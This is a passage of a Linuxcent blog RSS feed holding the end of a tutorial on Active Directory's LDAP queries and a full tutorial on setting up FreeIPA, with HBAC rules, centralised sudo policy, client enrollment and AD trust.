ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(&amp;(objectClass=computer)(operatingSystem=*Linux*))&quot; \
  cn operatingSystem lastLogonTimestamp

# Find disabled accounts
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(userAccountControl:1.2.840.113556.1.4.803:=2)&quot; \
  sAMAccountName
</code></pre>
<p>The last filter uses an LDAP extensible match (<code class="" data-line="">1.2.840.113556.1.4.803</code> is the OID for bitwise AND). <code class="" data-line="">userAccountControl:1.2.840.113556.1.4.803:=2</code> means &#8220;entries where userAccountControl AND 2 equals 2&#8221; — i.e., the ACCOUNTDISABLE bit is set. This is a Microsoft AD extension not in standard LDAP.</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;AD is just Microsoft&#8217;s LDAP.&#8221;</strong> AD is LDAP + Kerberos + DNS + DFS-R + GPO, all tightly integrated and with a schema that the Microsoft ecosystem depends on. You can query AD with standard <code class="" data-line="">ldapsearch</code>. You cannot replace it with OpenLDAP without breaking every Windows client.</p>
<p><strong>&#8220;Linux machines in AD get GPO.&#8221;</strong> Linux machines appear in AD and can be organized into OUs. Standard GPOs don&#8217;t apply to them. Samba&#8217;s <code class="" data-line="">samba-gpupdate</code> can process a subset of AD policy for Linux — mostly Registry and Security settings mapped to Linux equivalents.</p>
<p><strong>&#8220;realm leave removes the machine cleanly.&#8221;</strong> <code class="" data-line="">realm leave</code> removes local configuration but does not delete the machine account from AD. The stale computer object stays in <code class="" data-line="">CN=Computers</code> until an AD admin deletes it. Always run <code class="" data-line="">realm leave &amp;&amp; adcli delete-computer -U Administrator</code> for a clean removal.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>AD is the dominant enterprise identity store — understanding its LDAP structure, Kerberos realm, and GPO model is essential for IAM in mixed environments</td>
</tr>
<tr>
<td>CISSP Domain 4: Communications and Network Security</td>
<td>AD replication traffic (RPC, LDAP, Kerberos) is a significant portion of enterprise WAN traffic — Sites and site links are a network security and performance design decision</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>AD forest/domain/OU hierarchy is an architectural decision with long-term security consequences — getting OU structure wrong constrains GPO delegation for years</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>AD is LDAP + Kerberos + DNS + GPO + DFS-R — not a product that &#8220;uses&#8221; these; they&#8217;re the implementation</li>
<li>Replication is multi-master via USN + GUID; the KCC builds the topology automatically from Sites configuration</li>
<li><code class="" data-line="">objectGUID</code> is the stable identifier — not the DN, which changes on rename/move</li>
<li><code class="" data-line="">realm join</code> is the correct way to join Linux to AD — it configures SSSD, Kerberos, PAM, and NSS correctly in one command</li>
<li><code class="" data-line="">userAccountControl</code> is the bitmask that controls account state — <code class="" data-line="">(userAccountControl:1.2.840.113556.1.4.803:=2)</code> finds disabled accounts</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP09 covered AD — LDAP and Kerberos inside the corporate network. EP10 covers what happens when identity needs to work across the internet, where Kerberos doesn&#8217;t reach: SAML, OAuth2, and OIDC — the protocols that let identity leave the building.</p>
<p><em>Next: <a href="/saml-vs-oidc-vs-oauth2/">SAML vs OIDC vs OAuth2: Which Protocol Handles Which Identity Problem</a></em></p>
<p>Get EP10 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&#038;title=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" data-a2a-url="https://linuxcent.com/active-directory-ldap-kerberos/" data-a2a-title="How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood"></a></p><p>The post <a href="https://linuxcent.com/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/active-directory-ldap-kerberos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1796</post-id>	</item>
		<item>
		<title>FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</title>
		<link>https://linuxcent.com/freeipa-linux-identity-management/</link>
					<comments>https://linuxcent.com/freeipa-linux-identity-management/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 07 May 2026 05:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[FreeIPA]]></category>
		<category><![CDATA[HBAC]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Kerberos]]></category>
		<category><![CDATA[LDAP]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[linux-security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1793</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>FreeIPA combines 389-DS, MIT Kerberos, Dogtag PKI, and Bind DNS into one Linux identity stack. Set up HBAC rules, centralized sudo, and AD trust.</p>
<p>The post <a href="https://linuxcent.com/freeipa-linux-identity-management/">FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 8</em><br />
<a href="/ldap-high-availability/">EP07: LDAP HA</a> → <strong>EP08</strong> → <a href="/active-directory-ldap-kerberos/">EP09: Active Directory</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>FreeIPA is 389-DS (LDAP) + MIT Kerberos + Dogtag PKI + Bind DNS + SSSD — one <code class="" data-line="">ipa-server-install</code> command gets you an enterprise identity platform</li>
<li>Host-Based Access Control (HBAC) lets you define centrally: which users can SSH to which hosts — no more managing <code class="" data-line="">/etc/security/access.conf</code> per machine</li>
<li>Sudo rules from the directory: define <code class="" data-line="">sudo</code> policy centrally, have every machine pull it — no <code class="" data-line="">/etc/sudoers.d/</code> files scattered across the fleet</li>
<li><code class="" data-line="">ipa</code> CLI is the management interface — <code class="" data-line="">ipa user-add</code>, <code class="" data-line="">ipa group-add</code>, <code class="" data-line="">ipa hbacrule-add</code> — everything that took five LDAP commands takes one <code class="" data-line="">ipa</code> command</li>
<li>FreeIPA trusts with Active Directory let Linux machines authenticate AD users without joining the AD domain</li>
<li>The right choice for Linux-centric environments; AD is the right choice when Windows clients dominate</li>
</ul>
<hr />
<h2 id="the-big-picture-what-freeipa-integrates">The Big Picture: What FreeIPA Integrates</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                    FreeIPA Server                        │
│                                                         │
│  389-DS (LDAP)    MIT Kerberos    Dogtag PKI            │
│  ─────────────    ───────────     ─────────             │
│  User/group       TGT + service   Machine certs         │
│  storage          ticket issuing  User certs             │
│                                   OCSP / CRL            │
│  Bind DNS         SSSD (client)   Apache (WebUI)        │
│  ──────────       ────────────    ──────────────        │
│  SRV records      Enrollment      Management UI         │
│  for KDC/LDAP     automation      REST API              │
└─────────────────────────────────────────────────────────┘
              ▲                  ▲
              │ enrollment       │ SSH + sudo rules
   ┌──────────┴──────────┐  ┌───┴──────────────────┐
   │  Linux client        │  │  Linux client         │
   │  (ipa-client-install)│  │  (ipa-client-install) │
   └─────────────────────┘  └──────────────────────┘
</code></pre>
<p>EP06 and EP07 built OpenLDAP from components. FreeIPA gives you all of that plus Kerberos, PKI, DNS, and HBAC — opinionated, integrated, and managed through a single CLI and WebUI. This episode shows what you actually get from it.</p>
<hr />
<h2 id="why-freeipa-instead-of-bare-openldap">Why FreeIPA Instead of Bare OpenLDAP</h2>
<p>Running bare OpenLDAP requires you to:<br />
&#8211; Configure schema for POSIX accounts, SSH keys, sudo rules, HBAC manually<br />
&#8211; Set up MIT Kerberos separately and integrate it with LDAP<br />
&#8211; Build your own PKI for machine certificates<br />
&#8211; Maintain DNS SRV records for Kerberos discovery<br />
&#8211; Write client enrollment scripts<br />
&#8211; Build a management interface (or live in LDIF)</p>
<p>FreeIPA does all of this in one installer, with a consistent data model across all components. The trade-off is opacity — FreeIPA makes decisions for you (schema, replication topology, Kerberos realm name) that bare OpenLDAP leaves to you.</p>
<hr />
<h2 id="installing-freeipa-server">Installing FreeIPA Server</h2>
<pre><code class="" data-line=""># RHEL / Rocky / AlmaLinux
dnf install -y freeipa-server freeipa-server-dns

# Run the installer (interactive)
ipa-server-install

# Or non-interactive:
ipa-server-install \
  --realm=CORP.COM \
  --domain=corp.com \
  --ds-password=DM_password \
  --admin-password=Admin_password \
  --setup-dns \
  --forwarder=8.8.8.8 \
  --unattended

# After install: get an admin Kerberos ticket
kinit admin
</code></pre>
<p>The installer creates:<br />
&#8211; 389-DS instance with the FreeIPA schema<br />
&#8211; MIT KDC with realm <code class="" data-line="">CORP.COM</code><br />
&#8211; Dogtag CA and all certificate infrastructure<br />
&#8211; Bind DNS with SRV records for the KDC and LDAP server<br />
&#8211; Apache WebUI at <code class="" data-line="">https://ipa.corp.com/ipa/ui/</code><br />
&#8211; SSSD configured on the server itself</p>
<p>Time: 5–10 minutes. What used to take a week of manual configuration.</p>
<hr />
<h2 id="the-ipa-cli">The ipa CLI</h2>
<p>Every management action goes through <code class="" data-line="">ipa</code>. It talks to the IPA server&#8217;s REST API and handles Kerberos authentication transparently (it uses your <code class="" data-line="">kinit</code> session).</p>
<pre><code class="" data-line=""># Users
ipa user-add vamshi \
  --first=Vamshi --last=Krishna \
  --email=vamshi@corp.com \
  --password

ipa user-show vamshi
ipa user-find --all              # search all users
ipa user-disable vamshi          # lock account without deleting
ipa user-mod vamshi --shell=/bin/zsh

# Groups
ipa group-add engineers --desc &quot;Engineering team&quot;
ipa group-add-member engineers --users=vamshi,alice

# Password policy
ipa pwpolicy-mod --minlength=12 --maxlife=90 --history=10

# SSH public keys — stored centrally, pushed to every host
ipa user-mod vamshi --sshpubkey=&quot;ssh-ed25519 AAAA...&quot;
# SSSD on enrolled hosts will use this key for SSH login — no authorized_keys file needed
</code></pre>
<hr />
<h2 id="host-based-access-control-hbac">Host-Based Access Control (HBAC)</h2>
<p>HBAC is the feature that justifies FreeIPA for most Linux shops. It lets you define centrally: which users (or groups) can log in to which hosts (or host groups), using which services (SSH, sudo, FTP).</p>
<p>Without HBAC, access control is per-machine: <code class="" data-line="">/etc/security/access.conf</code> or PAM <code class="" data-line="">pam_access</code> rules, replicated across every server, managed inconsistently.</p>
<p>With HBAC: one rule, enforced everywhere.</p>
<pre><code class="" data-line=""># Create host groups
ipa hostgroup-add production-servers --desc &quot;Production Linux hosts&quot;
ipa hostgroup-add-member production-servers --hosts=web01.corp.com,db01.corp.com

# Create user groups
ipa group-add sre-team
ipa group-add-member sre-team --users=vamshi,alice

# Create an HBAC rule
ipa hbacrule-add allow-sre-to-prod \
  --desc &quot;SRE team can SSH to production&quot;
ipa hbacrule-add-user allow-sre-to-prod --groups=sre-team
ipa hbacrule-add-host allow-sre-to-prod --hostgroups=production-servers
ipa hbacrule-add-service allow-sre-to-prod --hbacsvcs=sshd

# Test the rule before applying
ipa hbactest \
  --user=vamshi \
  --host=web01.corp.com \
  --service=sshd
# Access granted: True
# Matched rules: allow-sre-to-prod
</code></pre>
<p>SSSD on each enrolled host enforces the HBAC rules at login time by querying the IPA server. No per-machine configuration. Add a new server to the <code class="" data-line="">production-servers</code> host group and the HBAC rules apply immediately.</p>
<hr />
<h2 id="sudo-rules-from-the-directory">Sudo Rules from the Directory</h2>
<pre><code class="" data-line=""># Create a sudo rule
ipa sudorule-add allow-sre-sudo \
  --cmdcat=all \
  --desc &quot;SRE team gets full sudo on production&quot;
ipa sudorule-add-user allow-sre-sudo --groups=sre-team
ipa sudorule-add-host allow-sre-sudo --hostgroups=production-servers

# Or a scoped rule — only specific commands
ipa sudorule-add allow-service-restart
ipa sudocmdgroup-add service-commands
ipa sudocmd-add /usr/bin/systemctl
ipa sudocmdgroup-add-member service-commands --sudocmds=&quot;/usr/bin/systemctl&quot;
ipa sudorule-add-allow-command allow-service-restart --sudocmdgroups=service-commands
</code></pre>
<p>On enrolled hosts, SSSD&#8217;s <code class="" data-line="">sssd_sudo</code> responder pulls these rules and the <code class="" data-line="">sudo</code> command evaluates them locally. No <code class="" data-line="">/etc/sudoers.d/</code> files. Central policy, local enforcement.</p>
<hr />
<h2 id="enrolling-a-client">Enrolling a Client</h2>
<pre><code class="" data-line=""># On the client machine
dnf install -y freeipa-client

ipa-client-install \
  --domain=corp.com \
  --server=ipa.corp.com \
  --realm=CORP.COM \
  --principal=admin \
  --password=Admin_password \
  --unattended

# What this does:
# 1. Registers the host in IPA as a machine principal
# 2. Retrieves a host Kerberos keytab (/etc/krb5.keytab)
# 3. Configures SSSD (sssd.conf, nsswitch.conf, pam.d)
# 4. Configures Kerberos (/etc/krb5.conf)
# 5. Optionally configures NTP and DNS
</code></pre>
<p>After enrollment: <code class="" data-line="">getent passwd vamshi</code> returns the IPA user. SSH with an IPA password works. HBAC rules are enforced. Sudo rules from the directory apply. SSH public keys from the user&#8217;s IPA profile work without <code class="" data-line="">authorized_keys</code> files.</p>
<hr />
<h2 id="freeipa-trust-with-active-directory">FreeIPA Trust with Active Directory</h2>
<p>In mixed environments (Linux servers + Windows clients), you can establish a trust between FreeIPA and AD without joining the Linux servers to the AD domain directly.</p>
<pre><code class="" data-line=""># On the IPA server (after installing ipa-server-trust-ad)
ipa-adtrust-install --netbios-name=CORP

# Establish the trust
ipa trust-add ad.corp.com \
  --admin=Administrator \
  --password \
  --type=ad

# AD users can now log in to IPA-enrolled Linux hosts
# They appear as: CORP.COM\username or username@corp.com
</code></pre>
<p>Under the hood: FreeIPA acts as an SSSD-enabled Samba DC for the trust relationship. AD users&#8217; Kerberos tickets from the AD KDC are accepted by the FreeIPA KDC, which maps them to POSIX attributes stored in IPA (or automatically generated via ID mapping).</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;FreeIPA is just OpenLDAP with a UI.&#8221;</strong> FreeIPA uses 389-DS (not OpenLDAP), adds a full Kerberos KDC, a certificate authority, DNS, HBAC enforcement, and sudo management — all with a consistent schema designed for these use cases. It&#8217;s an integrated identity platform, not a wrapper.</p>
<p><strong>&#8220;HBAC rules replace firewall rules.&#8221;</strong> HBAC controls who can log in to a host at the authentication layer — not network access. A blocked HBAC rule means the SSH session is rejected after TCP connection. You still need firewall rules to block TCP access.</p>
<p><strong>&#8220;FreeIPA replicas are identical.&#8221;</strong> FreeIPA uses 389-DS Multi-Supplier replication. All replicas accept reads and writes. But the CA is separate — only the initial server (and explicitly designated CA replicas) run the CA. If the CA goes down, certificate operations stop; authentication does not.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>FreeIPA is an enterprise IAM platform — HBAC, sudo policy, SSH key management, and certificate-based authentication are all IAM controls</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>FreeIPA&#8217;s integrated CA enables certificate-based authentication for machines and users — a stronger authentication factor than passwords</td>
</tr>
<tr>
<td>CISSP Domain 1: Security and Risk Management</td>
<td>Centralized HBAC and sudo policy reduces the attack surface of privilege escalation — no more inconsistent sudoers files that drift across the fleet</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>FreeIPA = 389-DS + MIT Kerberos + Dogtag PKI + Bind DNS — one installer, one management interface</li>
<li>HBAC rules define centrally who can SSH to which host groups — enforced by SSSD on every enrolled client, no per-machine config</li>
<li>Sudo rules from the directory replace scattered <code class="" data-line="">/etc/sudoers.d/</code> files — central policy, SSSD-enforced locally</li>
<li><code class="" data-line="">ipa hbactest</code> lets you verify access rules before a user hits a blocked login — use it before every policy change</li>
<li>For Linux-centric environments: FreeIPA. For Windows-dominant environments: AD. For mixed: FreeIPA trust with AD.</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>FreeIPA is the Linux answer to enterprise identity. EP09 covers the Microsoft answer — Active Directory — which extended LDAP and Kerberos into a complete enterprise platform with Group Policy, Sites, and a replication model built for global scale.</p>
<p><em>Next: <a href="/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a></em></p>
<p>Get EP09 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&#038;title=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" data-a2a-url="https://linuxcent.com/freeipa-linux-identity-management/" data-a2a-title="FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack"></a></p><p>The post <a href="https://linuxcent.com/freeipa-linux-identity-management/">FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/freeipa-linux-identity-management/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1793</post-id>	</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 

Served from: linuxcent.com @ 2026-07-03 03:54:50 by W3 Total Cache
-->